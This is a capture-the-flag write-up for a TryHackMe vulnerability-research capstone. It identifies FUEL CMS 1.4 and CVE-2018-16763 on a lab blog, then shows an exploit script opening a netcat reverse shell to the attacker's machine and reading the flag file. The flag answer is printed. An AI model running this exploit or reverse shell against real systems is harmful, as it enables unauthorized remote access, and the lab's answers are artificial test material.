Vulnerability Capstone | THM Writeups

Introduction

|333

Summarise the skills learnt in this module by completing this capstone room for the "Vulnerability Research" module.

Ackme Support Incorporated has recently set up a new blog. Their developer team have asked for a security audit to be performed before they create and publish articles to the public.

It is your task to perform a security audit on the blog; looking for and abusing any vulnerabilities that you find.

Let's get hacking No answer needed

Exploit the Machine (Flag Submission)

Deploy the vulnerable machine attached to this task & wait five minutes before visiting the vulnerable machine. No answer needed

What is the name of the application running on the vulnerable machine? FUEL CMS

What is the version number of this application? 1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application? Format: CVE-XXXX-XXXXX *CVE-2018-16763 * (https://www.exploit-db.com/exploits/49487)

Use the resources & skills learnt throughout this module to find and use a relevant exploit to exploit this vulnerability. Note: There are numerous exploits out there that can be used for this vulnerability (some more useful than others!) No answer needed

(https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py)

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 fuelcms_exploit.py 10.10.162.224

 ______         _ _____ ___  ___ _____                                                                                                                                 
|  ___|        | /  __ \|  \/  |/  ___|                                                                                                                                
| |_ _   _  ___| | /  \/| .  . |\ `--.                                                                                                                                 
|  _| | | |/ _ \ | |    | |\/| | `--. \                                                                                                                                
| | | |_| |  __/ | \__/\| |  | |/\__/ /                                                                                                                                
\_|  \__,_|\___|_|\____/\_|  |_/\____/                                                                                                                                 
Tested on 1.4                                                                                                                                                          
Created by Ac1d                                                           

        Menu                                                              
                                                                          
exit     -      Exit app                                                  
shell_me -      Get a reverse shell (netcat)                              
help     -      Show this help                                            
                                                                          
fuelCMS$ shell_me
Enter your attacking machine IP:PORT $ 10.11.81.220:4444

Hope you had your listener ready!!                                        
No result
fuelCMS$ 


┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.81.220] from (UNKNOWN) [10.10.162.224] 43692
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/var/www/html/fuelcms
$ cd /home/ubuntu
$ ls
flag.txt
$ cat flag.txt  
THM{ACKME_BLOG_HACKED}
$ exit
^C

THM{ACKME_BLOG_HACKED}

[[Exploit Vulnerabilities]]